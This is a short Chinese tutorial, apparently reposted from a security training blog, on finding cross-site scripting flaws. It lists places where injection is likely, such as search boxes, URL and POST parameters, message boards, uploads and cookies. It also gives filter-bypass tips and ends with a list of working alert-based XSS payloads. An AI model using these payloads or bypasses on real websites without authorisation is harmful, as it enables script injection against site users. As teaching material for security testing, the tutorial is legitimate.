xss挖掘初上手

本文主要总结了xss可能出现的场景。
偏向于案例,最后分享一哈简单的绕过和比较好用的标签。

 

1.搜索框

  • 首先看能否闭合前面的标签。

如输入111”><svg/onload=alert(1)>

查看源码是否将前面标签闭合,可闭合的话可触发xss

  • 如过无法闭合时,用事件来触发xss.

输入1111”><svg/onload=alert(1)>,F12看源码

发现”>无法闭合前面的标签。那么就用事件。

输入1111”onmouseout=”alert(1) 此处的事件是当鼠标放上去移走时触发xss

 

2.    url参数



直接在url参数上插入xss代码。

 

3.    Post传递的参数

在Post数据包的参数的xss

 

4.    留言板

留言板的基本都是存储xss

一般都是闭合前面字符,再插入xss代码。

具体要看插入的xss在源码中的位置。

5.    发布文章

发布文章处就和自定义一个html页面差不多。

可以自己自定义代码。同时要看系统的过滤了哪些标签。

src中存在较多的一般是某某智能系统,给你了模版,还可以自定义的。

 

 

6.    文件上传的名称处

此处xss较为少见,是因为返回包将输入的文件名重新输出了出来,造成了xss。

 

7.    文件上传内容(可定义html页面)

此处一般是上传文件php,asp,jsp等文件,系统会将其存储起来,而不解析。从而上传一个自定义的html让其解析。

访问返回的路径即可。

8.    数据包的cookie处

9.    url无参数处

一般的提交框中插入xss

无参数时。

 


 

  • 简单的绕过和标签

最后分享一下简单xss绕过。(还是要看输入的代码在源码中的位置)

三个弹窗函数 alert  confirm prompt

如设置了黑名单可通过编码绕过(url编码,html编码,bs64编码)

过滤了()或者将()输出成中文的()可以用``代替。


 

拿出较为好用的payload

<details/open/ontoggle=alert(1)>

<svg/onload=alert(1)>

<img/src/onerror=alert(1)>

<video/src/onerror=alert(1)>

<script>(alert)(1)</script>

<video><sourceonerror="javascript:alert(1)">

<video/src/onloadstart="alert(1)">

<ahref=javascript:alert(1)>222</a>

猜你喜欢

转载自www.cnblogs.com/ichunqiu/p/10083196.html